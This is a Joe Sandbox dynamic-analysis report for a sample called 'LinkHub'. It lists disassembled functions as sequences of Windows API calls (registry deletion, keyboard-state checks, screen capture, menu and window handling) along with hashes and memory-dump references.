                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: 0801eddcdd4a9d436a532ef2822130d8956d9d0fa7f0660900819443163508b3
                                                                    • Instruction ID: 5a4caf9047d0d355162588fce75bc0eba6a7cdf6cdf9307a6e532c1543afa6bc
                                                                    • Opcode Fuzzy Hash: 0801eddcdd4a9d436a532ef2822130d8956d9d0fa7f0660900819443163508b3
                                                                    • Instruction Fuzzy Hash: 99413775A01609AFDB119F65EC8CEAA7BB8EF89711F10805AF909E7260D7709D41CB60
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CC10E,?,?), ref: 002CD415
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD451
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD4C8
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002CC154
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002CC1D2
                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 002CC26A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 002CC2DE
                                                                    • RegCloseKey.ADVAPI32(?), ref: 002CC2FC
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 002CC352
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002CC364
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 002CC382
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 002CC3E3
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002CC3F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 146587525-4033151799
                                                                    • Opcode ID: 17a61c2bdce498ac7999715e5b9f55378ef0d986b1256b6a08b03463f3b886cb
                                                                    • Instruction ID: 8079bbf181defa7a8b7949f49979c4e52e930a5d4333fb1d54b1fdce60d4e080
                                                                    • Opcode Fuzzy Hash: 17a61c2bdce498ac7999715e5b9f55378ef0d986b1256b6a08b03463f3b886cb
                                                                    • Instruction Fuzzy Hash: 3FC17E70624642AFD715DF14C494F2ABBE5BF84308F28859CF45A8B2A2CB71EC56CF91
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 002DA990
                                                                    • GetSystemMetrics.USER32(00000011), ref: 002DA9A7
                                                                    • GetSystemMetrics.USER32(00000004), ref: 002DA9B3
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 002DA9C9
                                                                    • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 002DAC15
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002DAC33
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002DAC54
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 002DAC73
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002DAC95
                                                                    • DefDlgProcW.USER32(?,00000005,?), ref: 002DACBB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                    • String ID: @$(1
                                                                    • API String ID: 3962739598-1808408630
                                                                    • Opcode ID: 020afc498cadeb820e96b267876df0e72baf3d7915bba68d4c7c67518693ebe4
                                                                    • Instruction ID: 321af78debac4f4a8614c504a7c06203f4bbe55dc42ffc749e5148fe31c5153f
                                                                    • Opcode Fuzzy Hash: 020afc498cadeb820e96b267876df0e72baf3d7915bba68d4c7c67518693ebe4
                                                                    • Instruction Fuzzy Hash: B3B17A3161021AEFDF14CF68C989BAE7BB2FF44714F14806AEC45AA295D770ADA0CB51
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002D97B6
                                                                    • GetFocus.USER32 ref: 002D97C6
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 002D97D1
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 002D9879
                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002D992B
                                                                    • GetMenuItemCount.USER32(?), ref: 002D9948
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 002D9958
                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002D998A
                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002D99CC
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002D99FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                    • String ID: 0$(1
                                                                    • API String ID: 1026556194-2275602461
                                                                    • Opcode ID: 9a62a4b94766ede1299e22e9fadfaaa95a17b6c29c9953a21d42b26751d4bc88
                                                                    • Instruction ID: 6ab644de6f0354ea56c73f97014b220e599cbfb98e4890e62d091a58946607fb
                                                                    • Opcode Fuzzy Hash: 9a62a4b94766ede1299e22e9fadfaaa95a17b6c29c9953a21d42b26751d4bc88
                                                                    • Instruction Fuzzy Hash: C981BD71A243029FD710CF24D884AAB7BE8FB89714F10091EF98597391CB70DDA5DBA2
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 002C3035
                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002C3045
                                                                    • CreateCompatibleDC.GDI32(?), ref: 002C3051
                                                                    • SelectObject.GDI32(00000000,?), ref: 002C305E
                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 002C30CA
                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002C3109
                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002C312D
                                                                    • SelectObject.GDI32(?,?), ref: 002C3135
                                                                    • DeleteObject.GDI32(?), ref: 002C313E
                                                                    • DeleteDC.GDI32(?), ref: 002C3145
                                                                    • ReleaseDC.USER32(00000000,?), ref: 002C3150
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 815d2faf6f42f151ce29a0a7d21b3c0b2434580e9fc3376696a0ddf2e4856251
                                                                    • Instruction ID: d0bc9646ad5ecfc687f6c9bb75e1ca35e946b697b55740719919c0eefb3ee291
                                                                    • Opcode Fuzzy Hash: 815d2faf6f42f151ce29a0a7d21b3c0b2434580e9fc3376696a0ddf2e4856251
                                                                    • Instruction Fuzzy Hash: 8C61E276D11219AFCB04CFA4D888EAEBBB5FF48310F20851AE559A7250D771A951CF90
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 002A52E6
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 002A5328
                                                                    • _wcslen.LIBCMT ref: 002A5339
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 002A5345
                                                                    • _wcsstr.LIBVCRUNTIME ref: 002A537A
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 002A53B2
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 002A53EB
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 002A5445
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 002A5477
                                                                    • GetWindowRect.USER32(?,?), ref: 002A54EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                    • String ID: ThumbnailClass
                                                                    • API String ID: 1311036022-1241985126
                                                                    • Opcode ID: cb06c18072eca7e33afa77889d89b6233168bf222ca2f9e30e0dba6447082ad1
                                                                    • Instruction ID: 7d86726cf81d5b752c4e632ad70ef8e5416da95e6a5da1527aecc78fdad96d76
                                                                    • Opcode Fuzzy Hash: cb06c18072eca7e33afa77889d89b6233168bf222ca2f9e30e0dba6447082ad1
                                                                    • Instruction Fuzzy Hash: 8691F171524B17AFDB08DF24D894BABB7A9FF46304F404519FA8A82090EF31ED65CB91
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(003129C0,000000FF,00000000,00000030), ref: 002AC973
                                                                    • SetMenuItemInfoW.USER32(003129C0,00000004,00000000,00000030), ref: 002AC9A8
                                                                    • Sleep.KERNEL32(000001F4), ref: 002AC9BA
                                                                    • GetMenuItemCount.USER32(?), ref: 002ACA00
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 002ACA1D
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 002ACA49
                                                                    • GetMenuItemID.USER32(?,?), ref: 002ACA90
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002ACAD6
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002ACAEB
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002ACB0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                    • String ID: 0
                                                                    • API String ID: 1460738036-4108050209
                                                                    • Opcode ID: befe22061844f63a72bd88560794ee98a1bd3f6b81a171435a611834a3e28c71
                                                                    • Instruction ID: 9d46c76eabed2b2e02ebcf0ade0c73f5f54abb00d9609f1793c742ee9e50df92
                                                                    • Opcode Fuzzy Hash: befe22061844f63a72bd88560794ee98a1bd3f6b81a171435a611834a3e28c71
                                                                    • Instruction Fuzzy Hash: 0B61AF7092024AAFDF11CF68DD89AFE7BB8FB06348F244455E911A3252DB71AD24CB70
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002AE4D4
                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002AE4FA
                                                                    • _wcslen.LIBCMT ref: 002AE504
                                                                    • _wcsstr.LIBVCRUNTIME ref: 002AE554
                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002AE570
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 1939486746-1459072770
                                                                    • Opcode ID: 810f31c674a3ad032b0cd1e89d9caa9fcebc76dfa9db3ad359652ab70ca35f24
                                                                    • Instruction ID: b912fef5e042a2fe11e3b3a36c773233f4658bf13e682ddd87fe8ee6df9b2179
                                                                    • Opcode Fuzzy Hash: 810f31c674a3ad032b0cd1e89d9caa9fcebc76dfa9db3ad359652ab70ca35f24
                                                                    • Instruction Fuzzy Hash: A6413872A602047BEF01AB64DC47EFF77ACDF56710F000096F904A61C2FF74AA619AA5
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 002CD6C4
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 002CD6ED
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 002CD7A8
                                                                      • Part of subcall function 002CD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 002CD70A
                                                                      • Part of subcall function 002CD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 002CD71D
                                                                      • Part of subcall function 002CD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002CD72F
                                                                      • Part of subcall function 002CD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 002CD765
                                                                      • Part of subcall function 002CD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 002CD788
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 002CD753
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2734957052-4033151799
                                                                    • Opcode ID: fef008927e60f1acac2b5943edca3c4c3c5344297cb8a778c52f00e83e9c7dd7
                                                                    • Instruction ID: 4dda679066b08ed42231e18ccf926b33982d92d633c9e506a414d2f0c03996bd
                                                                    • Opcode Fuzzy Hash: fef008927e60f1acac2b5943edca3c4c3c5344297cb8a778c52f00e83e9c7dd7
                                                                    • Instruction Fuzzy Hash: 3A315C75D52129BBDB219F90EC88FFFBB7CEF45710F00026AB805E2140DA749E49DAA0
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 002AEFCB
                                                                      • Part of subcall function 0025F215: timeGetTime.WINMM(?,?,002AEFEB), ref: 0025F219
                                                                    • Sleep.KERNEL32(0000000A), ref: 002AEFF8
                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 002AF01C
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002AF03E
                                                                    • SetActiveWindow.USER32 ref: 002AF05D
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002AF06B
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 002AF08A
                                                                    • Sleep.KERNEL32(000000FA), ref: 002AF095
                                                                    • IsWindow.USER32 ref: 002AF0A1
                                                                    • EndDialog.USER32(00000000), ref: 002AF0B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 5f8ce5bf9e88d3562eec2a75ede6cff660cb41d6d1706e0cfa6b5ca86ba11117
                                                                    • Instruction ID: 7a2db58fcce44dce629df7cc58ae41da5df7773b8af61a88f4ef4140adecf0a8
                                                                    • Opcode Fuzzy Hash: 5f8ce5bf9e88d3562eec2a75ede6cff660cb41d6d1706e0cfa6b5ca86ba11117
                                                                    • Instruction Fuzzy Hash: 4921F075A21605BFEB122F60FCCDBA67B6DFB4E744F008026F90582272DF759C248A61
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002AF374
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002AF38A
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002AF39B
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002AF3AD
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002AF3BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_wcslen
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2420728520-1007645807
                                                                    • Opcode ID: 348f05c79d70a81f589c671011fd0706cc1cd5975819acce87294da225255290
                                                                    • Instruction ID: 40a9c24680c07a2b80e65e299a26065d66f3dd28761079b6a72b1923909740ea
                                                                    • Opcode Fuzzy Hash: 348f05c79d70a81f589c671011fd0706cc1cd5975819acce87294da225255290
                                                                    • Instruction Fuzzy Hash: AA11E331EA11997ADB25B7A18C1AEFF6A7CEBD2B00F000469B401E20D1DFA06D55C9B1
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00273007
                                                                      • Part of subcall function 00272D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0027DB51,?,00000000,?,00000000,?,0027DB78,?,00000007,?,?,0027DF75,?), ref: 00272D4E
                                                                      • Part of subcall function 00272D38: GetLastError.KERNEL32(?,?,0027DB51,?,00000000,?,00000000,?,0027DB78,?,00000007,?,?,0027DF75,?,?), ref: 00272D60
                                                                    • _free.LIBCMT ref: 00273013
                                                                    • _free.LIBCMT ref: 0027301E
                                                                    • _free.LIBCMT ref: 00273029
                                                                    • _free.LIBCMT ref: 00273034
                                                                    • _free.LIBCMT ref: 0027303F
                                                                    • _free.LIBCMT ref: 0027304A
                                                                    • _free.LIBCMT ref: 00273055
                                                                    • _free.LIBCMT ref: 00273060
                                                                    • _free.LIBCMT ref: 0027306E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID: &.
                                                                    • API String ID: 776569668-4214823543
                                                                    • Opcode ID: 5091fe86a29ea8026e6211f2d411b27450f851f2e0ab8ac5778b3c1a7031f835
                                                                    • Instruction ID: 136b5e07db10b1501cfcd7c0fbbd4510d19f018c4a3a487015c4c797b131b2a8
                                                                    • Opcode Fuzzy Hash: 5091fe86a29ea8026e6211f2d411b27450f851f2e0ab8ac5778b3c1a7031f835
                                                                    • Instruction Fuzzy Hash: 05117476520108EFCB11EF94C942DDD3BA9EF05350F9185A5FA0C9B222DA31EA659F90
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 002AA9D9
                                                                    • SetKeyboardState.USER32(?), ref: 002AAA44
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 002AAA64
                                                                    • GetKeyState.USER32(000000A0), ref: 002AAA7B
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 002AAAAA
                                                                    • GetKeyState.USER32(000000A1), ref: 002AAABB
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 002AAAE7
                                                                    • GetKeyState.USER32(00000011), ref: 002AAAF5
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 002AAB1E
                                                                    • GetKeyState.USER32(00000012), ref: 002AAB2C
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 002AAB55
                                                                    • GetKeyState.USER32(0000005B), ref: 002AAB63
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 7b0ed8a4744ee62d8efcf07cbac3d51a53fb1b95649f20566dc08403bb2a28de
                                                                    • Instruction ID: bb39019ced0f33d79aab372f90dcacbcfeca41cc7b9e16589f685ca7500a7ce3
                                                                    • Opcode Fuzzy Hash: 7b0ed8a4744ee62d8efcf07cbac3d51a53fb1b95649f20566dc08403bb2a28de
                                                                    • Instruction Fuzzy Hash: C351D460A147862BEB35DFB08854BAAAFF59F13344F08459E85C21B1C3DF649B5CCB62
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 002A6649
                                                                    • GetWindowRect.USER32(00000000,?), ref: 002A6662
                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 002A66C0
                                                                    • GetDlgItem.USER32(?,00000002), ref: 002A66D0
                                                                    • GetWindowRect.USER32(00000000,?), ref: 002A66E2
                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 002A6736
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002A6744
                                                                    • GetWindowRect.USER32(00000000,?), ref: 002A6756
